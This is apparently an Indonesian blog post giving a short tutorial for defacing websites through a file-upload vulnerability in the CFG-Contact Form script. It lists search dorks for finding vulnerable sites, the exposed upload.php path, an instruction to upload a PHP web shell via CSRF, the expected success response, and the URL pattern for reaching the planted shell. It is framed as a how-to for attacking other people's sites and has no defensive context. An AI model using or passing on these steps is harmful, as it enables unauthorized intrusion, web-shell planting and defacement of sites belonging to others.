Deface Menggunakan CFG-Contact Form Vulnerability File Upload
kali ini saya mau share tutorial mengenai salah satu teknik deface yang di buat oleh member dari team Indonesian Cyber Freedom. Oke Langsung aja .
#Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
Cari target dengan dork diatas
Pilih salah satu target dan masukan Exploit dibawah ini
# Exploit tergantung contact form yang keberapa agan pilih
www.site.com/[path]/cfg-contactform-1/inc/upload.php
lalu upload shell dengan CSRF
Kalau sukses nanti ada tulisan ["filename":"shell.php"]
#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php [tergantung dork yg lu pake]
Semoga bermanfaat
Post a Comment